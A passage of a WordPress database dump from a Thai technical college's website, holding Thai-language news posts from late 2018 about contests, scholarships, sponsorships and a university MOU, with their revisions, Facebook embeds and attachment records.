0),
(4685, 3, '2018-12-03 09:17:56', '2018-12-03 02:17:56', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.710798852629639%26type%3D3&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D711196919256499%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D711206825922175%26id%3D100010985913485&width=500\" width=\"500\" height=\"657\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', '\"สุดยอดนวัตกรรมอาชีวศึกษา\" การประกวดสิ่งประดิษฐ์ของคนรุ่นใหม่ ระดับอาชีวศึกษาจังหวัดระยอง ประจำปีการศึกษา ๒๕๖๑ ระหว่างวันที่ ๒๐-๒๑ พฤศจิกายน ๒๕๖๑ ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%aa%e0%b8%b8%e0%b8%94%e0%b8%a2%e0%b8%ad%e0%b8%94%e0%b8%99%e0%b8%a7%e0%b8%b1%e0%b8%95%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%a8%e0%b8%b6%e0%b8%81', '', '', '2018-12-03 11:15:59', '2018-12-03 04:15:59', '', 0, 'http://www.technicrayong.ac.th/?p=4685', 231, 'post', '', 0),
(4686, 3, '2018-12-03 09:17:56', '2018-12-03 02:17:56', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.710798852629639%26type%3D3&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', '\"สุดยอดนวัตกรรมอาชีวศึกษา\" การประกวดสิ่งประดิษฐ์ของคนรุ่นใหม่ ระดับอาชีวศึกษาจังหวัดระยอง ประจำปีการศึกษา ๒๕๖๑ ระหว่างวันที่ ๒๐-๒๑ พฤศจิกายน ๒๕๖๑ ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4685-revision-v1', '', '', '2018-12-03 09:17:56', '2018-12-03 02:17:56', '', 4685, 'http://www.technicrayong.ac.th/4685-revision-v1/', 0, 'revision', '', 0),
(4687, 3, '2018-12-03 09:22:31', '2018-12-03 02:22:31', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D710819312627593%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๒๐ พฤศจิกายน ๒๕๖๑ บันทึกข้อตกลงทำความร่วมมือ(MOU) ระหว่างวิทยาลัยเทคนิคระยอง กับ มหาวิทยาลัย Don Honorio Ventura Technological State University Philippines ประเทศฟิลิปปินส์ เพื่อขยายและจัดการศึกษาในภาควิชาภาษาอังกฤษ Mini English Program โดยมีผู้อำนวยการและรองผู้อำนวยการสถาบันการอาชีวศึกษาภาคตะวันออก เป็นพยานบันทึกข้อตกลงทำความร่วมมือในครั้งนี้ ณ ห้องประชุม ชั้น ๒ อาคารสถาบันอาชีวศึกษาภาคตะวันออก วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%92%e0%b9%90-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a2', '', '', '2018-12-03 09:22:31', '2018-12-03 02:22:31', '', 0, 'http://www.technicrayong.ac.th/?p=4687', 230, 'post', '', 0),
(4688, 3, '2018-12-03 09:22:13', '2018-12-03 02:22:13', '', '46472619_710819072627617_5889898084200087552_n', '', 'inherit', 'closed', 'closed', '', '46472619_710819072627617_5889898084200087552_n', '', '', '2018-12-03 09:22:13', '2018-12-03 02:22:13', '', 4687, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/46472619_710819072627617_5889898084200087552_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(4689, 3, '2018-12-03 09:22:31', '2018-12-03 02:22:31', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D710819312627593%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๒๐ พฤศจิกายน ๒๕๖๑ บันทึกข้อตกลงทำความร่วมมือ(MOU) ระหว่างวิทยาลัยเทคนิคระยอง กับ มหาวิทยาลัย Don Honorio Ventura Technological State University Philippines ประเทศฟิลิปปินส์ เพื่อขยายและจัดการศึกษาในภาควิชาภาษาอังกฤษ Mini English Program โดยมีผู้อำนวยการและรองผู้อำนวยการสถาบันการอาชีวศึกษาภาคตะวันออก เป็นพยานบันทึกข้อตกลงทำความร่วมมือในครั้งนี้ ณ ห้องประชุม ชั้น ๒ อาคารสถาบันอาชีวศึกษาภาคตะวันออก วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4687-revision-v1', '', '', '2018-12-03 09:22:31', '2018-12-03 02:22:31', '', 4687, 'http://www.technicrayong.ac.th/4687-revision-v1/', 0, 'revision', '', 0),
(4690, 3, '2018-12-03 09:25:48', '2018-12-03 02:25:48', '', '46457881_710801739296017_739959772031221760_o', '', 'inherit', 'closed', 'closed', '', '46457881_710801739296017_739959772031221760_o', '', '', '2018-12-03 09:25:48', '2018-12-03 02:25:48', '', 4685, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/46457881_710801739296017_739959772031221760_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4692, 3, '2018-12-03 10:48:26', '2018-12-03 03:48:26', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%A2%E0%B8%81%E0%B9%80%E0%B8%A5%E0%B8%B4%E0%B8%81%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-62.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ยกเลิกแผนการจัดซื้อจัดจ้าง ประจำปีงบประมาณ พ.ศ.๒๕๖๒', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a2%e0%b8%81%e0%b9%80%e0%b8%a5%e0%b8%b4%e0%b8%81%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%8b', '', '', '2018-12-03 10:48:26', '2018-12-03 03:48:26', '', 0, 'http://www.technicrayong.ac.th/?p=4692', 229, 'post', '', 0),
(4693, 3, '2018-12-03 10:48:11', '2018-12-03 03:48:11', '', 'ยกเลิกแผนการจัดซื้อจัดจ้าง 62', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a2%e0%b8%81%e0%b9%80%e0%b8%a5%e0%b8%b4%e0%b8%81%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%88%e0%b8%b1%e0%b8%94', '', '', '2018-12-03 10:48:11', '2018-12-03 03:48:11', '', 4692, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/ยกเลิกแผนการจัดซื้อจัดจ้าง-62.pdf', 0, 'attachment', 'application/pdf', 0),
(4694, 3, '2018-12-03 10:48:26', '2018-12-03 03:48:26', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%A2%E0%B8%81%E0%B9%80%E0%B8%A5%E0%B8%B4%E0%B8%81%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-62.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ยกเลิกแผนการจัดซื้อจัดจ้าง ประจำปีงบประมาณ พ.ศ.๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4692-revision-v1', '', '', '2018-12-03 10:48:26', '2018-12-03 03:48:26', '', 4692, 'http://www.technicrayong.ac.th/4692-revision-v1/', 0, 'revision', '', 0),
(4695, 3, '2018-12-03 11:13:15', '2018-12-03 04:13:15', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.710798852629639%26type%3D3&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D711196919256499%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D711206825922175%26id%3D100010985913485&width=500\" width=\"500\" height=\"657\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', '\"สุดยอดนวัตกรรมอาชีวศึกษา\" การประกวดสิ่งประดิษฐ์ของคนรุ่นใหม่ ระดับอาชีวศึกษาจังหวัดระยอง ประจำปีการศึกษา ๒๕๖๑ ระหว่างวันที่ ๒๐-๒๑ พฤศจิกายน ๒๕๖๑ ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4685-autosave-v1', '', '', '2018-12-03 11:13:15', '2018-12-03 04:13:15', '', 4685, 'http://www.technicrayong.ac.th/4685-autosave-v1/', 0, 'revision', '', 0),
(4696, 3, '2018-12-03 11:12:51', '2018-12-03 04:12:51', '', '46488045_711196739256517_1628095443328040960_o', '', 'inherit', 'closed', 'closed', '', '46488045_711196739256517_1628095443328040960_o', '', '', '2018-12-03 11:12:51', '2018-12-03 04:12:51', '', 4685, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/46488045_711196739256517_1628095443328040960_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4697, 3, '2018-12-03 11:15:59', '2018-12-03 04:15:59', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.710798852629639%26type%3D3&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D711196919256499%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D711206825922175%26id%3D100010985913485&width=500\" width=\"500\" height=\"657\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', '\"สุดยอดนวัตกรรมอาชีวศึกษา\" การประกวดสิ่งประดิษฐ์ของคนรุ่นใหม่ ระดับอาชีวศึกษาจังหวัดระยอง ประจำปีการศึกษา ๒๕๖๑ ระหว่างวันที่ ๒๐-๒๑ พฤศจิกายน ๒๕๖๑ ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4685-revision-v1', '', '', '2018-12-03 11:15:59', '2018-12-03 04:15:59', '', 4685, 'http://www.technicrayong.ac.th/4685-revision-v1/', 0, 'revision', '', 0),
(4698, 3, '2018-12-03 11:20:32', '2018-12-03 04:20:32', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D711322209243970%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D712314455811412%26id%3D100010985913485&width=500\" width=\"500\" height=\"770\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บริษัทฮอนด้าปิยะ จำกัด ร่วมกับ บริษัท เอ.พี. ฮอนด้า จำกัด โดยคุณวสินธ์ ล่องดุริยางค์ ผู้จัดการบริษัท ฮอนด้าปิยะ จำกัด และคณะ มอบเงินสนับสนุน จำนวน ๒๐,๐๐๐ บาท ซึ่งเป็นส่วนหนึ่งในกิจกรรมการเข้าแข่งขันฮอนด้าประหยัดเชื้อเพลิง ปีที่ 21/2561 ณ สนามช้างอินเตอร์เนชั่นแนลเซอร์กิต จังหวัดบุรีรัมย์ ที่จัดขึ้นระหว่างวันที่ ๑๒-๑๓ พฤศจิกายน ๒๕๖๑ ที่ผ่านมา โดยรับมอบเงินสนับสนุนดังกล่าวฯ ณ อาคารช่างยนต์ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%a9%e0%b8%b1%e0%b8%97%e0%b8%ae%e0%b8%ad%e0%b8%99%e0%b8%94%e0%b9%89%e0%b8%b2%e0%b8%9b%e0%b8%b4%e0%b8%a2%e0%b8%b0-%e0%b8%88%e0%b8%b3%e0%b8%81%e0%b8%b1%e0%b8%94-%e0%b8%a3', '', '', '2018-12-03 13:40:03', '2018-12-03 06:40:03', '', 0, 'http://www.technicrayong.ac.th/?p=4698', 228, 'post', '', 0),
(4699, 3, '2018-12-03 11:20:07', '2018-12-03 04:20:07', '', '46508887_711316772577847_7610738454317498368_o', '', 'inherit', 'closed', 'closed', '', '46508887_711316772577847_7610738454317498368_o', '', '', '2018-12-03 11:20:07', '2018-12-03 04:20:07', '', 4698, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/46508887_711316772577847_7610738454317498368_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4700, 3, '2018-12-03 11:20:32', '2018-12-03 04:20:32', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D711322209243970%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n ', 'บริษัทฮอนด้าปิยะ จำกัด ร่วมกับ บริษัท เอ.พี. ฮอนด้า จำกัด โดยคุณวสินธ์ ล่องดุริยางค์ ผู้จัดการบริษัท ฮอนด้าปิยะ จำกัด และคณะ มอบเงินสนับสนุน จำนวน ๒๐,๐๐๐ บาท ซึ่งเป็นส่วนหนึ่งในกิจกรรมการเข้าแข่งขันฮอนด้าประหยัดเชื้อเพลิง ปีที่ 21/2561 ณ สนามช้างอินเตอร์เนชั่นแนลเซอร์กิต จังหวัดบุรีรัมย์ ที่จัดขึ้นระหว่างวันที่ ๑๒-๑๓ พฤศจิกายน ๒๕๖๑ ที่ผ่านมา โดยรับมอบเงินสนับสนุนดังกล่าวฯ ณ อาคารช่างยนต์ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4698-revision-v1', '', '', '2018-12-03 11:20:32', '2018-12-03 04:20:32', '', 4698, 'http://www.technicrayong.ac.th/4698-revision-v1/', 0, 'revision', '', 0),
(4701, 3, '2018-12-03 11:24:37', '2018-12-03 04:24:37', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D711766892532835%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ ๒๒ พฤศจิกายน ๒๕๖๑ บริษัท กรุงเทพ ซินธิติกส์ จำกัด จัดพิธีมอบทุนการศึกษา ประจำปีการศึกษา ๒๕๖๑ โดยมอบทุนการศึกษาให้กับนักศึกษาระดับ ปวส.๑ สาขาวิชาปิโตรเคมี เคมีอุตสาหกรรม เทคโนโลยียาง เทคนิคการผลิต ไฟฟ้า และอิเล็กทรอนิกส์ จำนวน ๑๐ ทุน ทุนละ ๕,๐๐๐ บาท รวมเป็นเงิน ๕๐,๐๐๐ บาท', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88%e2%80%8b-%e0%b9%92%e0%b9%92-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4', '', '', '2018-12-03 11:24:37', '2018-12-03 04:24:37', '', 0, 'http://www.technicrayong.ac.th/?p=4701', 227, 'post', '', 0),
(4702, 3, '2018-12-03 11:24:18', '2018-12-03 04:24:18', '', '46743464_711761939199997_3346610986302832640_o', '', 'inherit', 'closed', 'closed', '', '46743464_711761939199997_3346610986302832640_o', '', '', '2018-12-03 11:24:18', '2018-12-03 04:24:18', '', 4701, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/46743464_711761939199997_3346610986302832640_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4703, 3, '2018-12-03 11:24:37', '2018-12-03 04:24:37', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D711766892532835%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ ๒๒ พฤศจิกายน ๒๕๖๑ บริษัท กรุงเทพ ซินธิติกส์ จำกัด จัดพิธีมอบทุนการศึกษา ประจำปีการศึกษา ๒๕๖๑ โดยมอบทุนการศึกษาให้กับนักศึกษาระดับ ปวส.๑ สาขาวิชาปิโตรเคมี เคมีอุตสาหกรรม เทคโนโลยียาง เทคนิคการผลิต ไฟฟ้า และอิเล็กทรอนิกส์ จำนวน ๑๐ ทุน ทุนละ ๕,๐๐๐ บาท รวมเป็นเงิน ๕๐,๐๐๐ บาท', '', 'inherit', 'closed', 'closed', '', '4701-revision-v1', '', '', '2018-12-03 11:24:37', '2018-12-03 04:24:37', '', 4701, 'http://www.technicrayong.ac.th/4701-revision-v1/', 0, 'revision', '', 0),
(4704, 3, '2018-12-03 12:38:49', '2018-12-03 05:38:49', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D712239309152260%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ ๒๓ พฤศจิกายน ๒๕๖๑ มูลนิธิไทยซัมมิทพัฒนา จัดพิธีมอบทุนการศึกษา ประจำปีการศึกษา ๒๕๖๑ ณ พัฒนา กอล์ฟ คลับ แอนด์ รีสอร์ท โดยมีคุณชนาพรรณ จึงรุ่งเรืองกิจ รองประธานมูลนิธิไทยซัมมิทพัฒนา เป็นประธานในพิธี ซึ่งนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ได้รับทุนการศึกษา จำนวน ๑๐ ทุน ประกอบด้วย ระดับ ปวช. จำนวน ๕ ทุน ทุนละ ๔,๐๐๐ บาท ระดับ ปวส. จำนวน ๕ ทุน ทุนละ ๔,๕๐๐ บาท รวมเป็นเงินทั้งสิ้น ๔๒,๕๐๐ บาท', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88%e2%80%8b-%e0%b9%92%e0%b9%93-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a2', '', '', '2018-12-03 12:38:49', '2018-12-03 05:38:49', '', 0, 'http://www.technicrayong.ac.th/?p=4704', 226, 'post', '', 0),
(4705, 3, '2018-12-03 12:10:54', '2018-12-03 05:10:54', '', '46513438_712237995819058_3854682154013294592_o', '', 'inherit', 'closed', 'closed', '', '46513438_712237995819058_3854682154013294592_o', '', '', '2018-12-03 12:10:54', '2018-12-03 05:10:54', '', 4704, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/46513438_712237995819058_3854682154013294592_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4706, 3, '2018-12-03 12:38:49', '2018-12-03 05:38:49', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D712239309152260%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ ๒๓ พฤศจิกายน ๒๕๖๑ มูลนิธิไทยซัมมิทพัฒนา จัดพิธีมอบทุนการศึกษา ประจำปีการศึกษา ๒๕๖๑ ณ พัฒนา กอล์ฟ คลับ แอนด์ รีสอร์ท โดยมีคุณชนาพรรณ จึงรุ่งเรืองกิจ รองประธานมูลนิธิไทยซัมมิทพัฒนา เป็นประธานในพิธี ซึ่งนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ได้รับทุนการศึกษา จำนวน ๑๐ ทุน ประกอบด้วย ระดับ ปวช. จำนวน ๕ ทุน ทุนละ ๔,๐๐๐ บาท ระดับ ปวส. จำนวน ๕ ทุน ทุนละ ๔,๕๐๐ บาท รวมเป็นเงินทั้งสิ้น ๔๒,๕๐๐ บาท', '', 'inherit', 'closed', 'closed', '', '4704-revision-v1', '', '', '2018-12-03 12:38:49', '2018-12-03 05:38:49', '', 4704, 'http://www.technicrayong.ac.th/4704-revision-v1/', 0, 'revision', '', 0),
(4707, 3, '2018-12-03 13:19:23', '2018-12-03 06:19:23', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D711322209243970%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D712314455811412%26id%3D100010985913485&width=500\" width=\"500\" height=\"770\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บริษัทฮอนด้าปิยะ จำกัด ร่วมกับ บริษัท เอ.พี. ฮอนด้า จำกัด โดยคุณวสินธ์ ล่องดุริยางค์ ผู้จัดการบริษัท ฮอนด้าปิยะ จำกัด และคณะ มอบเงินสนับสนุน จำนวน ๒๐,๐๐๐ บาท ซึ่งเป็นส่วนหนึ่งในกิจกรรมการเข้าแข่งขันฮอนด้าประหยัดเชื้อเพลิง ปีที่ 21/2561 ณ สนามช้างอินเตอร์เนชั่นแนลเซอร์กิต จังหวัดบุรีรัมย์ ที่จัดขึ้นระหว่างวันที่ ๑๒-๑๓ พฤศจิกายน ๒๕๖๑ ที่ผ่านมา โดยรับมอบเงินสนับสนุนดังกล่าวฯ ณ อาคารช่างยนต์ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4698-revision-v1', '', '', '2018-12-03 13:19:23', '2018-12-03 06:19:23', '', 4698, 'http://www.technicrayong.ac.th/4698-revision-v1/', 0, 'revision', '', 0),
(4708, 3, '2018-12-03 13:22:46', '2018-12-03 06:22:46', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D714001502309374%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ ๒๖ พฤศจิกายน ๒๕๖๑ คณะครูและนักศึกษาระดับ ปวส.๒ สาขาวิชาเทคนิคการผลิต และสาขาวิชาไฟฟ้า เข้าร่วมกิจกรรม Open House ของบริษัท เอ็นเอส-สยามยูไนเต็ดสตีล จำกัด (NS-SUS)', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88%e2%80%8b-%e0%b9%92%e0%b9%96%e2%80%8b-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81', '', '', '2018-12-03 13:22:46', '2018-12-03 06:22:46', '', 0, 'http://www.technicrayong.ac.th/?p=4708', 225, 'post', '', 0),
(4709, 3, '2018-12-03 13:22:12', '2018-12-03 06:22:12', '', '46731085_714000298976161_5902792134368428032_o', '', 'inherit', 'closed', 'closed', '', '46731085_714000298976161_5902792134368428032_o', '', '', '2018-12-03 13:22:12', '2018-12-03 06:22:12', '', 4708, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/46731085_714000298976161_5902792134368428032_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4710, 3, '2018-12-03 13:22:46', '2018-12-03 06:22:46', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D714001502309374%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ ๒๖ พฤศจิกายน ๒๕๖๑ คณะครูและนักศึกษาระดับ ปวส.๒ สาขาวิชาเทคนิคการผลิต และสาขาวิชาไฟฟ้า เข้าร่วมกิจกรรม Open House ของบริษัท เอ็นเอส-สยามยูไนเต็ดสตีล จำกัด (NS-SUS)', '', 'inherit', 'closed', 'closed', '', '4708-revision-v1', '', '', '2018-12-03 13:22:46', '2018-12-03 06:22:46', '', 4708, 'http://www.technicrayong.ac.th/4708-revision-v1/', 0, 'revision', '', 0),
(4711, 3, '2018-12-03 13:26:33', '2018-12-03 06:26:33', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.714050442304480&type=3\"><img class=\"aligncenter size-full wp-image-4712\" src=\"/wp-content/uploads/2018/12/3-12-2561-13-27-50.jpg\" alt=\"\" width=\"461\" height=\"619\" /></a>', 'วันจันทร์ที่ ๒๖ พฤศจิกายน ๒๕๖๑ วิทยาลัยเทคนิคระยอง เข้ารับการประเมินองค์การมาตรฐานดีเด่น องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย โดยมี นางณัฐธารีย์ สิรกุลปัญญาพร นายอานุภาพ วาสะสิริ รองผู้อำนวยการวิทยาลัยเทคนิคระยอง ต้อนรับคณะกรรมตรวจประเมินฯ ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', 